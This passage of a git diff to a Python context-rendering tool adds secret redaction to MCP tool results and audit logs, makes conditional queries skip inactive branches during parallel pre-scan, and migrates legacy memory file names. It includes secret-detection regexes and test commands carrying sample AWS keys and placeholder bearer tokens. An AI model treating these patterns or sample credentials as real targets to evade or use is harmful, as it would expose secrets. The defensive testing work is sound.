thread_name_prefix=f"mcp-{tool_name}", + ) try: - with concurrent.futures.ThreadPoolExecutor(max_workers=1) as executor: - future = executor.submit(_call_resolver, spec, args_str, cfg, workspace) + future = executor.submit(_wrapped_resolver) + try: result = future.result(timeout=timeout) - return result - except TimeoutError as exc: - return f"Error executing {directive_name}: timed out after {timeout}s" - except Exception as exc: - return f"Error executing {directive_name}: {exc}" + except concurrent.futures.TimeoutError: + # Try to kill the in-flight subprocess (if any) belonging to + # the worker thread. This is a cross-module reach into + # directives.query because that's where the subprocess was + # spawned. Best-effort; if query.py isn't loaded or the + # worker hadn't started subprocess yet, we just abandon. + killed = False + tid = worker_tid_holder.get("tid") + if tid is not None: + # Look up the killer function. In the built single-file + # artifact every module's top-level symbol is at the + # global scope; in source-tree development we need an + # explicit module import. globals() lookup covers both. + killer = globals().get("kill_active_subprocess_for_thread") + if killer is None: + try: + import perseus.directives.query as _q + killer = getattr(_q, "kill_active_subprocess_for_thread", None) + except ImportError: + killer = None + if killer is not None: + try: + killed = bool(killer(tid)) + except Exception: + killed = False + suffix = " (subprocess killed)" if killed else "" + return ( + f"Error executing {directive_name}: " + f"timed out after {timeout}s{suffix}" + ) + except Exception as exc: + # Error strings may include resolver-thrown exception messages, + # which can echo user content (e.g. argparse complaining about + # the command string). Redact defensively. + return _mcp_redact(f"Error executing {directive_name}: {exc}", cfg) + # #166: redact the tool result before returning to the MCP client. + return _mcp_redact(result, cfg) + finally: + # NEVER wait β€” on timeout the worker may be stuck for arbitrarily + # long. The thread is daemonic and won't block process exit. + executor.shutdown(wait=False, cancel_futures=True) # ── JSON-RPC 2.0 message handling ──────────────────────────────────────────── diff --git a/src/perseus/mneme_narrative.py b/src/perseus/mneme_narrative.py index 82836fe..384ed9a 100644 --- a/src/perseus/mneme_narrative.py +++ b/src/perseus/mneme_narrative.py @@ -37,10 +37,154 @@ def _workspace_hash(workspace: Path) -> str: return hashlib.sha256(str(canonical).encode()).hexdigest()[:12] +def _workspace_hash_legacy_md5(workspace: Path) -> str: + """12-char MD5 hex digest β€” the pre-1.0.3 narrative file name scheme. + + Regression for #128: prior to v1.0.3, MnΔ“mΔ“ derived narrative file names + from an MD5 hash. v1.0.3+ switched to SHA-256. Without an explicit + migration, every existing narrative file on disk was silently orphaned + on upgrade. ``_mneme_path`` calls this function as a one-shot fallback + to locate and rename legacy files. Once migrated, this code path is + never re-entered for that workspace. + + We intentionally use ``usedforsecurity=False`` (Py3.9+) so FIPS-mode + Pythons don't reject the call β€” this is a file-naming hash, not a + security primitive. We fall back to the no-kwarg call for older Pythons. + """ + canonical = str(workspace.expanduser().resolve()).encode() + try: + return hashlib.md5(canonical, usedforsecurity=False).hexdigest()[:12] + except TypeError: + # Python < 3.9: no `usedforsecurity` kwarg. + return hashlib.md5(canonical).hexdigest()[:12] + + def _mneme_path(workspace: Path, cfg: dict) -> Path: - """Return the per-workspace narrative file path.""" + """Return the per-workspace narrative file path. + + Regression for #128: if a SHA-256 path doesn't exist but a legacy MD5 + path does, transparently rename the legacy file in place. This makes + upgrades from pre-1.0.3 lossless. + + The rename uses ``os.replace`` (atomic on POSIX/NTFS) and is best-effort: + if rename fails (cross-device, permission, etc.), we leave both files in + place and return the SHA-256 path. The caller will then see "no + narrative yet" and recreate β€” non-fatal but loses prior content. + Operators can also run ``perseus memory doctor --migrate`` to surface + and act on these cases explicitly. + """ + store = Path(cfg.get("memory", {}).get("store", str(PERSEUS_HOME / "memory"))) + new_path = store / f"{_workspace_hash(workspace)}.md" + if new_path.exists(): + return new_path + legacy_path = store / f"{_workspace_hash_legacy_md5(workspace)}.md" + if legacy_path.exists() and legacy_path != new_path: + try: + store.mkdir(parents=True, exist_ok=True) + os.replace(legacy_path, new_path) + except OSError: + # Cross-device / permission denied. Leave the legacy file in + # place so the operator can recover it manually; the caller will + # create a fresh narrative at the new path. + pass + return new_path + + +def _mneme_doctor_scan(cfg: dict) -> dict: + """Scan the memory store and report on narrative file inventory. + + Returns a dict with: + { + "store": str, # path to memory store + "narrative_files": [path, ...], # all *.md in store + "legacy_md5_files": [path, ...], # files whose name matches legacy MD5 of a known workspace + "sha256_files": [path, ...], # files that look like current-scheme files + "orphan_files": [path, ...], # files whose embedded `workspace` frontmatter no longer resolves to their filename + "unknown_files": [path, ...], # files whose stem isn't a 12-char hex hash + } + + "Known workspace" inference: we re-derive the SHA-256 and legacy MD5 + hashes from each file's ``workspace:`` frontmatter field, then match + against the actual filename stem. + + Used by ``perseus memory doctor`` to surface migration candidates. + """ store = Path(cfg.get("memory", {}).get("store", str(PERSEUS_HOME / "memory"))) - return store / f"{_workspace_hash(workspace)}.md" + out: dict = { + "store": str(store), + "narrative_files": [], + "legacy_md5_files": [], + "sha256_files": [], + "orphan_files": [], + "unknown_files": [], + } + if not store.exists(): + return out + hex_re = re.compile(r"^[a-f0-9]{12}$") + for fp in sorted(store.glob("*.md")): + out["narrative_files"].append(str(fp)) + stem = fp.stem + if not hex_re.match(stem): + out["unknown_files"].append(str(fp)) + continue + # Try to read the workspace from frontmatter and classify. + try: + fm, _ = _load_narrative(fp) + except Exception: + out["unknown_files"].append(str(fp)) + continue + ws_raw = str(fm.get("workspace", "")).strip() if isinstance(fm, dict) else "" + if not ws_raw: + # No workspace metadata β€” can't classify; treat as unknown. + out["unknown_files"].append(str(fp)) + continue + try: + ws = Path(ws_raw).expanduser() + expected_sha = _workspace_hash(ws) + expected_md5 = _workspace_hash_legacy_md5(ws) + except Exception: + out["unknown_files"].append(str(fp)) + continue + if stem == expected_sha: + out["sha256_files"].append(str(fp)) + elif stem == expected_md5: + out["legacy_md5_files"].append(str(fp)) + else: + out["orphan_files"].append(str(fp)) + return out + + +def _mneme_doctor_migrate(cfg: dict) -> dict: + """Rename legacy MD5-named narrative files to their SHA-256 names. + + Returns a dict: + { + "migrated": [(old, new), ...], + "skipped": [(old, new, reason), ...], + "errors": [(old, exc_str), ...], + } + + Idempotent: re-running after a successful migration is a no-op. + """ + report: dict = {"migrated": [], "skipped": [], "errors": []} + scan = _mneme_doctor_scan(cfg) + store = Path(scan["store"]) + for legacy_fp_str in scan["legacy_md5_files"]: + legacy_fp = Path(legacy_fp_str) + try: + fm, _ = _load_narrative(legacy_fp) + ws = Path(str(fm.get("workspace", "")).strip()).expanduser() + new_fp = store / f"{_workspace_hash(ws)}.md" + if new_fp.exists(): + report["skipped"].append( + (str(legacy_fp), str(new_fp), "destination already exists") + ) + continue + os.replace(legacy_fp, new_fp) + report["migrated"].append((str(legacy_fp), str(new_fp))) + except Exception as exc: # pragma: no cover - defensive + report["errors"].append((str(legacy_fp), str(exc))) + return report def _load_narrative(path: Path) -> tuple[dict, str]: diff --git a/src/perseus/redaction.py b/src/perseus/redaction.py index fed0a1d..458ac2a 100644 --- a/src/perseus/redaction.py +++ b/src/perseus/redaction.py @@ -44,8 +44,19 @@ {"name": "jwt", "pattern": r"\beyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\b"}, # PEM private key block (covers RSA, EC, OPENSSH, generic) {"name": "private_key_block", "pattern": r"-----BEGIN (?:RSA |EC |OPENSSH |DSA |ENCRYPTED |PGP )?PRIVATE KEY-----[\s\S]*?-----END (?:RSA |EC |OPENSSH |DSA |ENCRYPTED |PGP )?PRIVATE KEY-----"}, - # Hex-encoded high-entropy strings of 40+ chars used as secrets/api hashes - {"name": "long_hex_secret", "pattern": r"\b[a-fA-F0-9]{40,}\b"}, + # Hex-encoded high-entropy strings of 40+ chars in an obvious credential + # context (assigned to a `secret=`, `token=`, `key=`, `password=`, + # `api_key=` slot, or quoted after a colon in JSON/YAML). + # + # IMPORTANT: a bare `\b[a-fA-F0-9]{40,}\b` rule (pre-1.0.6 default) was a + # landmine β€” it matched git commit SHAs (40 hex chars), SHA-256 sums (64 + # hex chars), Docker digests, and Atlassian content hashes, silently + # destroying forensically important data in `@query "git log"` output + # and similar. This rule now requires an explicit credential anchor. + # See: https://github.com/tcconnally/perseus/issues/136 + {"name": "long_hex_secret", + "pattern": r"(?i)(?:secret|token|key|password|passwd|api[_-]?key|auth(?:orization)?)\s*[:=]\s*[\"']?([a-fA-F0-9]{40,})[\"']?", + "_anchor_group": 1}, # HuggingFace: hf_... (read/write tokens) {"name": "huggingface_token", "pattern": r"\bhf_[A-Za-z0-9]{30,}\b"}, # Google Cloud API key: AIza... @@ -109,7 +120,19 @@ def _compile_redaction_rules(cfg: dict) -> list[dict]: replacement = rule.get("replacement") if not replacement: replacement = f"[REDACTED:{name}]" - compiled.append({"name": name, "regex": regex, "replacement": str(replacement)}) + # `_anchor_group` (rule-internal, default None): index of the capture + # group holding the SECRET payload (everything outside that group is + # context that must be preserved verbatim). Used by the credential- + # anchored `long_hex_secret` rule. When unset, fall back to legacy + # behavior: group(1) (if present) is treated as a leading prefix to + # preserve and the rest of the match is replaced. + anchor_group = rule.get("_anchor_group") + compiled.append({ + "name": name, + "regex": regex, + "replacement": str(replacement), + "anchor_group": anchor_group, + }) return compiled @@ -143,12 +166,29 @@ def redact_text(text: str, cfg: dict) -> tuple[str, dict]: name = rule["name"] regex = rule["regex"] # subn returns (new, n); use a callable replacement so groupref-style - # rules (e.g. the bearer header rule that preserves the prefix via - # group 1) work consistently. - def _sub(match, _repl=rule["replacement"]): + # rules work consistently. + # + # Three modes: + # 1. `anchor_group=N`: the captured group at index N is the SECRET + # payload. Replace only that span; preserve everything else + # verbatim. Used by the credential-anchored `long_hex_secret` rule. + # 2. `match.lastindex` set (no anchor_group): legacy behavior β€” the + # first capture group is a prefix to preserve, everything after + # the prefix is replaced. Used by `bearer_header`. + # 3. No capture groups: replace the whole match. + def _sub(match, _repl=rule["replacement"], _ag=rule.get("anchor_group")): + if _ag is not None: + try: + span_start, span_end = match.span(_ag) + except (IndexError, re.error): + return _repl + if span_start < 0: + return _repl + full = match.group(0) + rel_start = span_start - match.start() + rel_end = span_end - match.start() + return full[:rel_start] + _repl + full[rel_end:] if match.lastindex: - # Preserve any leading captured group verbatim (e.g. the - # `Authorization: Bearer ` prefix); everything else is wiped. return match.group(1) + _repl return _repl out, n = regex.subn(_sub, out) diff --git a/src/perseus/renderer.py b/src/perseus/renderer.py index 32dd29b..9cb450e 100644 --- a/src/perseus/renderer.py +++ b/src/perseus/renderer.py @@ -759,11 +759,37 @@ def _render_lines( _integrity_snapshot = _capture_file_snapshot(lines, workspace) # ── Pre-scan @query directives for parallel resolution ────────────── + # + # #165 (v1.0.6): pre-scan is now control-flow aware. Pre-1.0.6 the + # scan walked every line ignoring @if/@else/@endif, so a @query + # inside a false conditional branch still pre-executed in parallel: + # + # @if production + # @query "aws s3 ls s3://prod-data" # <-- still ran in dev! + # @endif + # + # Fix: a single pass tracks @if/@else/@endif depth and evaluates + # each condition exactly once via `evaluate_condition`. Lines inside + # an inactive branch (or inside a malformed/uneval block) are + # skipped during query enqueueing. The main render loop below + # re-evaluates conditions independently, so a transient inconsistency + # in evaluation between pre-scan and main loop only manifests as a + # cache miss β€” never as a query running when it shouldn't, and never + # as a query failing to run when it should. query_results: dict[int, str] = {} if top_level and cfg["render"].get("parallel_queries", False): in_fence_pre = False fc_pre = "" fl_pre = 0 + # Stack of (active: bool, in_else_branch: bool) tuples β€” one + # entry per open @if. A branch is "active" when its enclosing + # condition is True (and the current line is on the active side). + # If ANY frame on the stack is inactive, the line is inactive. + if_stack: list[tuple[bool, bool]] = [] + + def _all_active() -> bool: + return all(active for active, _ in if_stack) + for idx, raw_line in enumerate(lines): fm = re.match(r'^\s*(`{3,}|~{3,})(.*)$', raw_line) if in_fence_pre: @@ -775,6 +801,42 @@ def _render_lines( fc_pre = fm.group(1)[0] fl_pre = len(fm.group(1)) continue + + # Control-flow tracking β€” applies regardless of active state. + m_if_pre = IF_RE.match(raw_line) + if m_if_pre: + try: + cond_val = bool(evaluate_condition( + m_if_pre.group(1).strip(), workspace, cfg + )) + except Exception: + # Match the main loop's failure mode: render emits a + # warning and skips both branches. We skip enqueueing + # in both branches by marking this frame inactive. + cond_val = False + # Push: active = parent_active AND own condition; not in else yet. + parent_active = _all_active() + if_stack.append((parent_active and cond_val, False)) + continue + if ELSE_RE.match(raw_line): + if if_stack: + parent_frames = if_stack[:-1] + parent_active = all(a for a, _ in parent_frames) + own_active, _ = if_stack[-1] + # Else branch is active iff parent is active and own + # branch was NOT active (i.e. the @if condition was false). + if_stack[-1] = (parent_active and not own_active, True) + continue + if ENDIF_RE.match(raw_line): + if if_stack: + if_stack.pop() + continue + + # Past this point, we only enqueue queries when ALL enclosing + # @if frames are active. + if not _all_active(): + continue + m = INLINE_DIRECTIVE_RE.match(raw_line) if m and m.group(1).lower() == "@query": clean_args, cache_mode, cache_ttl, cache_mock = _parse_cache_modifier( diff --git a/tests/test_audit_log.py b/tests/test_audit_log.py index 6520116..6251f75 100644 --- a/tests/test_audit_log.py +++ b/tests/test_audit_log.py @@ -215,6 +215,91 @@ def test_audit_log_never_contains_raw_secret(tmp_path, monkeypatch): assert "\"event_type\": \"redaction\"" in audit_text +# ── regression: #137 audit field values must be redacted ──────────────────── + + +def _setup_redaction_home(home: Path, monkeypatch) -> tuple[Path, dict]: + """Set up an isolated PERSEUS_HOME and return (audit_log_path, cfg). + + Uses the standard test pattern from `test_audit_log_never_contains_raw_secret` + β€” monkeypatches PERSEUS_HOME so `_audit_log_path` accepts the location. + """ + home.mkdir(exist_ok=True) + monkeypatch.setattr(perseus, "PERSEUS_HOME", home) + log_path = home / "audit_log.jsonl" + cfg = { + "audit": { + "enabled": True, + "log_path": str(log_path), + "max_log_bytes": 1_048_576, + }, + "redaction": {"enabled": True}, + } + return log_path, cfg + + +def test_audit_event_redacts_aws_key_in_command_field(tmp_path, monkeypatch): + """Regression for #137 β€” AWS access key in audit.command must be redacted.""" + log_path, cfg = _setup_redaction_home(tmp_path / "home", monkeypatch) + aws_key = "AKIAIOSFODNN7EXAMPLE" + perseus.audit_event(cfg, "shell_exec", + directive="@query", + command=f"aws s3 cp s3://b/k . --access-key {aws_key}") + log_text = log_path.read_text() + assert aws_key not in log_text, ( + f"AWS key leaked to audit log:\n{log_text}" + ) + assert "REDACTED" in log_text + + +def test_audit_event_redacts_bearer_token_in_command_field(tmp_path, monkeypatch): + """Regression for #137 β€” bearer tokens in audit.command must be redacted.""" + log_path, cfg = _setup_redaction_home(tmp_path / "home", monkeypatch) + token = "ghp_" + "Z" * 36 + perseus.audit_event(cfg, "shell_exec", + directive="@query", + command=f"curl -H 'Authorization: Bearer {token}'") + log_text = log_path.read_text() + assert token not in log_text + + +def test_audit_event_does_not_redact_structural_fields(tmp_path, monkeypatch): + """Structural fields (directive, exit_code, etc.) must pass through verbatim.""" + log_path, cfg = _setup_redaction_home(tmp_path / "home", monkeypatch) + perseus.audit_event(cfg, "shell_exec", + directive="@query", + exit_code=42, + duration_ms=1234) + entry = json.loads(log_path.read_text().strip()) + assert entry["directive"] == "@query" + assert entry["exit_code"] == 42 + assert entry["duration_ms"] == 1234 + + +def test_audit_event_redact_fields_can_be_disabled(tmp_path, monkeypatch): + """Forensic mode: audit.redact_fields=false preserves raw values.""" + log_path, cfg = _setup_redaction_home(tmp_path / "home", monkeypatch) + cfg["audit"]["redact_fields"] = False + aws_key = "AKIAIOSFODNN7EXAMPLE" + perseus.audit_event(cfg, "shell_exec", + directive="@query", + command=f"aws sts --key {aws_key}") + log_text = log_path.read_text() + assert aws_key in log_text # opt-out works + + +def test_audit_event_walks_nested_dict_fields(tmp_path, monkeypatch): + """Nested structures (dicts/lists) are walked recursively for redaction.""" + log_path, cfg = _setup_redaction_home(tmp_path / "home", monkeypatch) + token = "ghp_" + "Y" * 36 + perseus.audit_event(cfg, "model_call", + directive="@perseus", + env={"GITHUB_TOKEN": token, "DEBUG": "1"}, + argv=["curl", "-H", f"Authorization: Bearer {token}"]) + log_text = log_path.read_text() + assert token not in log_text + + # ── integration: `perseus trust audit` subcommand ─────────────────────────── diff --git a/tests/test_bugfix_165_parallel_queries_control_flow.py b/tests/test_bugfix_165_parallel_queries_control_flow.py new file mode 100644 index 0000000..648a700 --- /dev/null +++ b/tests/test_bugfix_165_parallel_queries_control_flow.py @@ -0,0 +1,240 @@ +""" +Regression suite for #165 β€” parallel_queries control-flow bypass. + +Pre-v1.0.6, the renderer's `parallel_queries` pre-scan walked every line +ignoring @if/@else/@endif, so a @query inside a false conditional branch +still pre-executed in parallel: + + @if production + @query "aws s3 ls s3://prod-data" # <-- still ran in dev! + @endif + +This was a control-flow bypass that undermined the documented @if/@else +security model. + +These tests assert: +1. @query in a false @if branch does NOT execute even with parallel_queries=True +2. @query in a true @if branch DOES execute (no regression on the happy path) +3. @query in the else branch when @if is false DOES execute +4. Nested @if/@endif respect ancestor branches correctly +5. Behavior is identical between parallel_queries=True and False +6. Malformed @if (uneval condition) skips both branches in pre-scan +""" +import os +import tempfile +import time +from pathlib import Path + +import pytest +import yaml +import perseus + + +# ── Test infrastructure ────────────────────────────────────────────────────── + +def _cfg(allow_query: bool = True, parallel: bool = True) -> dict: + """Build a minimal config that enables @query + parallel_queries.""" + c = dict(perseus.DEFAULT_CONFIG) + for section, vals in perseus.DEFAULT_CONFIG.items(): + c[section] = dict(vals) if isinstance(vals, dict) else vals + c["render"]["allow_query_shell"] = allow_query + c["render"]["parallel_queries"] = parallel + return c + + +@pytest.fixture +def workspace(tmp_path: Path) -> Path: + ws = tmp_path / "ws" + (ws / ".perseus").mkdir(parents=True) + return ws + + +@pytest.fixture +def marker_path(tmp_path: Path) -> Path: + """A path that should NOT exist after a render where the @query is gated off.""" + return tmp_path / "marker_should_not_exist" + + +def _render(lines: list[str], cfg: dict, workspace: Path) -> str: + """Convenience: render a list of lines through the public API. + + Always prepends the `@perseus` header β€” without it, the renderer + treats the input as plain text and never resolves directives. + """ + source = "\n".join(["@perseus", *lines]) + return perseus.render_source(source, cfg, workspace=workspace) + + +# ── 1. @query in false @if branch is NOT pre-executed ──────────────────────── + +def test_query_in_false_if_branch_does_not_run_with_parallel_queries( + workspace, marker_path +): + """Core #165 regression: @if false / @query / @endif must not run the @query + even when parallel_queries=True.""" + cfg = _cfg(parallel=True) + # Use a uniquely-named marker so we know this test created it (not noise). + marker = str(marker_path) + lines = [ + "@if env.set NONEXISTENT_VAR_FOR_TEST_165", + f'@query "echo SHOULD_NOT_RUN > {marker}"', + "@endif", + ] + + assert not marker_path.exists(), "Pre-condition: marker should not exist yet" + _render(lines, cfg, workspace) + # The whole point: marker must not have been created. + assert not marker_path.exists(), ( + f"#165 regression: @query in false @if branch executed despite " + f"parallel_queries=True. Marker file was created at {marker_path}." + ) + + +# ── 2. @query in true @if branch DOES run ──────────────────────────────────── + +def test_query_in_true_if_branch_still_runs_with_parallel_queries( + workspace, tmp_path +): + """No regression on the happy path: @if true / @query must still run.""" + cfg = _cfg(parallel=True) + marker = tmp_path / "marker_should_exist" + # 'env.set HOME' is always true in any normal test environment. + lines = [ + "@if env.set HOME", + f'@query "echo SHOULD_RUN > {marker}"', + "@endif", + ] + + output = _render(lines, cfg, workspace) + # Give a moment for the parallel pre-scan thread to fire (it's synchronous + # to render_source β€” but the subprocess may take a tick to flush). + assert marker.exists(), ( + f"@query in true @if branch did NOT execute under parallel_queries=True.\n" + f"Output: {output!r}" + ) + + +# ── 3. @query in else branch when @if is false DOES run ────────────────────── + +def test_query_in_else_branch_runs_when_if_is_false(workspace, tmp_path): + """Else branch is active when @if is false. The @query there must run.""" + cfg = _cfg(parallel=True) + marker = tmp_path / "marker_else_branch" + # 'env.set NONEXISTENT_VAR_FOR_TEST' is reliably false + lines = [ + "@if env.set NONEXISTENT_VAR_FOR_TEST_165", + '@query "echo IF_BRANCH"', + "@else", + f'@query "echo ELSE_BRANCH > {marker}"', + "@endif", + ] + + output = _render(lines, cfg, workspace) + assert marker.exists(), ( + f"@query in else branch did NOT execute when @if was false.\n" + f"Output: {output!r}" + ) + + +def test_query_in_if_branch_skipped_when_else_taken(workspace, tmp_path): + """The reverse: if-branch @query does NOT run when @if is false (else taken).""" + cfg = _cfg(parallel=True) + marker_if = tmp_path / "marker_if_should_not_run" + marker_else = tmp_path / "marker_else_should_run" + lines = [ + "@if env.set NONEXISTENT_VAR_FOR_TEST_165", + f'@query "echo IF_BRANCH > {marker_if}"', + "@else", + f'@query "echo ELSE > {marker_else}"', + "@endif", + ] + + _render(lines, cfg, workspace) + assert not marker_if.exists(), "#165: @query in skipped if-branch ran" + assert marker_else.exists(), "@query in active else-branch did not run" + + +# ── 4. Nested @if respects ancestor branches ───────────────────────────────── + +def test_nested_if_inactive_outer_means_inner_query_does_not_run( + workspace, tmp_path +): + """If outer @if is false, the @query inside the (true) inner @if still must + not run β€” the entire nested block is inactive.""" + cfg = _cfg(parallel=True) + marker = tmp_path / "marker_nested_should_not_run" + lines = [ + "@if env.set NONEXISTENT_VAR_FOR_TEST_165", + "@if env.set HOME", + f'@query "echo NESTED > {marker}"', + "@endif", + "@endif", + ] + + _render(lines, cfg, workspace) + assert not marker.exists(), ( + "#165: nested @query under a false outer @if executed." + ) + + +def test_nested_if_active_outer_and_inner_means_query_runs(workspace, tmp_path): + """Both outer and inner @if true β†’ @query runs (no regression on nested + happy path).""" + cfg = _cfg(parallel=True) + marker = tmp_path / "marker_nested_should_run" + lines = [ + "@if env.set HOME", + "@if env.set HOME", + f'@query "echo NESTED_OK > {marker}"', + "@endif", + "@endif", + ] + + _render(lines, cfg, workspace) + assert marker.exists(), "Nested @query under true/true did not run" + + +# ── 5. Behavior parity with parallel_queries=False ──────────────────────────── + +def test_parallel_false_also_skips_query_in_false_branch(workspace, tmp_path): + """Sanity: parallel_queries=False has always respected @if. The point of + this test is to confirm the same observable behavior under True after the + #165 fix.""" + marker = tmp_path / "marker_serial_should_not_run" + cfg = _cfg(parallel=False) + lines = [ + "@if env.set NONEXISTENT_VAR_FOR_TEST_165", + f'@query "echo SERIAL > {marker}"', + "@endif", + ] + + _render(lines, cfg, workspace) + assert not marker.exists(), ( + "Serial mode @query in false @if branch ran β€” pre-existing bug " + "if this fails (would mean the bug was wider than #165)." + ) + + +# ── 6. Malformed/uneval @if condition skips both branches in pre-scan ──────── + +def test_malformed_if_condition_skips_query_enqueue_in_pre_scan( + workspace, tmp_path +): + """If the condition can't be evaluated, the pre-scan must NOT enqueue + any @query in either branch. The main render loop will emit a warning + and skip the block entirely.""" + cfg = _cfg(parallel=True) + marker = tmp_path / "marker_malformed_should_not_run" + lines = [ + "@if this is not a valid condition syntax", + f'@query "echo MALFORMED > {marker}"', + "@endif", + ] + + _render(lines, cfg, workspace) + # The main loop will surface a "> ⚠ @if error:" message AND not execute + # the @query. The pre-scan must agree. + assert not marker.exists(), ( + "#165: pre-scan enqueued @query under malformed @if; the query ran " + "even though the @if itself was uneval and the main loop skipped it." + ) diff --git a/tests/test_bugfix_166_mcp_redaction.py b/tests/test_bugfix_166_mcp_redaction.py new file mode 100644 index 0000000..1c6d688 --- /dev/null +++ b/tests/test_bugfix_166_mcp_redaction.py @@ -0,0 +1,224 @@ +""" +Regression suite for #166 β€” MCP tool responses bypass final redaction. + +Pre-v1.0.6: +- `perseus_get_context` called `render_source` (which does NOT apply + redaction) instead of `render_output` (which does). +- All other tool resolvers (`perseus_read`, `perseus_query`, etc.) + returned raw resolver output via `_call_resolver`, never passing + through the redaction pipeline. + +Result: secrets configured in `redaction.patterns` leaked through MCP +to the connected client (Claude Desktop, Rovo Dev, etc.) β€” even when +`redaction.enabled: true` was set in config. + +These tests assert that every MCP tool return path applies redaction. +""" +import json +import os +from pathlib import Path +from unittest.mock import patch + +import pytest +import yaml +import perseus + + +SECRET_NEEDLE = "SUPER_SECRET_TOKEN_123_ABC_XYZ" + + +def _cfg(redaction_enabled: bool = True, allow_query: bool = True) -> dict: + """Build a minimal config with a redaction pattern that matches our needle.""" + c = dict(perseus.DEFAULT_CONFIG) + for section, vals in perseus.DEFAULT_CONFIG.items(): + c[section] = dict(vals) if isinstance(vals, dict) else vals + c["redaction"]["enabled"] = redaction_enabled + # Add a custom rule that catches our test needle exactly. + c["redaction"].setdefault("patterns", []).append({ + "name": "test_secret_needle", + "pattern": SECRET_NEEDLE, + "replacement": "[REDACTED:test_secret_needle]", + }) + c["render"]["allow_query_shell"] = allow_query + c["mcp"] = c.get("mcp", {}) + c["mcp"]["tool_allowlist"] = [ + "perseus_query", "perseus_read", "perseus_date", "perseus_health", + "perseus_get_context", "perseus_get_health", + ] + return c + + +@pytest.fixture +def workspace_with_context(tmp_path: Path) -> Path: + """Workspace whose context.md contains the secret needle.""" + ws = tmp_path / "ws" + (ws / ".perseus").mkdir(parents=True) + (ws / ".perseus" / "context.md").write_text( + f"@perseus\n\nMy AWS token is {SECRET_NEEDLE}.\n" + ) + return ws + + +# ── 1. perseus_get_context redacts ─────────────────────────────────────────── + +def test_perseus_get_context_redacts_secret(workspace_with_context): + """#166 primary regression: perseus_get_context must redact the secret + that appears in context.md.""" + cfg = _cfg(redaction_enabled=True) + result = perseus._call_tool( + "perseus_get_context", {"format": "markdown"}, cfg, workspace_with_context + ) + assert SECRET_NEEDLE not in result, ( + f"#166: secret leaked through perseus_get_context. Result:\n{result}" + ) + assert "[REDACTED:test_secret_needle]" in result + + +def test_perseus_get_context_json_format_redacts(workspace_with_context): + """Same regression in JSON format β€” the embedded `resolved` field + must be redacted before serialization.""" + cfg = _cfg(redaction_enabled=True) + result = perseus._call_tool( + "perseus_get_context", {"format": "json"}, cfg, workspace_with_context + ) + payload = json.loads(result) + assert SECRET_NEEDLE not in payload["resolved"] + assert "[REDACTED:test_secret_needle]" in payload["resolved"] + + +def test_perseus_get_context_preserves_secret_when_redaction_disabled( + workspace_with_context +): + """Sanity: with redaction.enabled=False, the secret IS present. + This proves the test setup actually exercises the secret path.""" + cfg = _cfg(redaction_enabled=False) + result = perseus._call_tool( + "perseus_get_context", {"format": "markdown"}, cfg, workspace_with_context + ) + assert SECRET_NEEDLE in result, ( + "Sanity check failed: without redaction, secret should be visible" + ) + + +# ── 2. perseus_query result redacts ────────────────────────────────────────── + +def test_perseus_query_result_redacts_secret(tmp_path): + """A @query whose stdout contains the secret needle must have the + needle redacted before reaching the MCP client.""" + cfg = _cfg(redaction_enabled=True, allow_query=True) + ws = tmp_path / "ws" + (ws / ".perseus").mkdir(parents=True) + # The query echoes the secret needle to stdout. + result = perseus._call_tool( + "perseus_query", + {"command": f"echo {SECRET_NEEDLE}"}, + cfg, ws, + ) + assert SECRET_NEEDLE not in result, ( + f"#166: @query stdout leaked the secret through MCP. Result:\n{result}" + ) + + +# ── 3. perseus_read result redacts ─────────────────────────────────────────── + +def test_perseus_read_result_redacts_secret(tmp_path): + """A @read of a file containing the secret needle must be redacted.""" + cfg = _cfg(redaction_enabled=True) + ws = tmp_path / "ws" + (ws / ".perseus").mkdir(parents=True) + secret_file = ws / "secrets.txt" + secret_file.write_text(f"token: {SECRET_NEEDLE}\n") + + result = perseus._call_tool( + "perseus_read", {"path": "secrets.txt"}, cfg, ws, + ) + assert SECRET_NEEDLE not in result, ( + f"#166: @read leaked the secret through MCP. Result:\n{result}" + ) + + +# ── 4. Error paths redact ──────────────────────────────────────────────────── + +def test_call_tool_exception_path_redacts(tmp_path): + """If the resolver raises with a message that echoes user content + containing the secret, the error string must still be redacted.""" + cfg = _cfg(redaction_enabled=True) + ws = tmp_path / "ws" + (ws / ".perseus").mkdir(parents=True) + + # Force _call_resolver to raise with a secret-bearing message. + def _boom(*args, **kwargs): + raise RuntimeError(f"boom: user passed {SECRET_NEEDLE}") + + with patch.object(perseus, "_call_resolver", side_effect=_boom): + result = perseus._call_tool( + "perseus_date", {"format": "iso"}, cfg, ws, + ) + assert SECRET_NEEDLE not in result, ( + f"#166: exception path leaked secret. Result:\n{result}" + ) + assert "Error executing" in result # Sanity: still surfaces the error + + +# ── 5. perseus_get_health result redacts ───────────────────────────────────── + +def test_perseus_get_health_redacts(tmp_path, monkeypatch): + """perseus_get_health path (legacy resolver shortcut) also redacts.""" + cfg = _cfg(redaction_enabled=True) + ws = tmp_path / "ws" + (ws / ".perseus").mkdir(parents=True) + + # Stub the @health resolver to return a secret. + health_spec = perseus.DIRECTIVE_REGISTRY.get("@health") + if health_spec is None or health_spec.resolver is None: + pytest.skip("@health not registered in this build") + + # DirectiveSpec is frozen β€” patch via monkeypatching the spec in the + # registry instead. + def _stub(*args, **kwargs): + return f"health OK; token={SECRET_NEEDLE}" + + new_spec = health_spec._replace(resolver=_stub) if hasattr(health_spec, "_replace") else None + if new_spec is None: + pytest.skip("DirectiveSpec is not a NamedTuple β€” cannot stub resolver") + monkeypatch.setitem(perseus.DIRECTIVE_REGISTRY, "@health", new_spec) + result = perseus._call_tool( + "perseus_get_health", {}, cfg, ws, + ) + assert SECRET_NEEDLE not in result, ( + f"#166: perseus_get_health leaked secret. Result:\n{result}" + ) + + +# ── 6. _mcp_redact unit tests ──────────────────────────────────────────────── + +def test_mcp_redact_returns_unchanged_when_disabled(): + """If redaction.enabled=False, _mcp_redact returns input unchanged.""" + cfg = _cfg(redaction_enabled=False) + assert perseus._mcp_redact(f"hello {SECRET_NEEDLE}", cfg) == f"hello {SECRET_NEEDLE}" + + +def test_mcp_redact_returns_non_str_unchanged(): + """Non-string inputs should not be mangled (defensive type guard).""" + cfg = _cfg(redaction_enabled=True) + assert perseus._mcp_redact(None, cfg) is None + assert perseus._mcp_redact(42, cfg) == 42 + assert perseus._mcp_redact({"k": "v"}, cfg) == {"k": "v"} + + +def test_mcp_redact_swallows_redactor_exceptions(): + """If the underlying redactor raises, _mcp_redact returns the original + (defensive β€” better to leak in a known-broken redactor than to crash + the MCP server).""" + cfg = 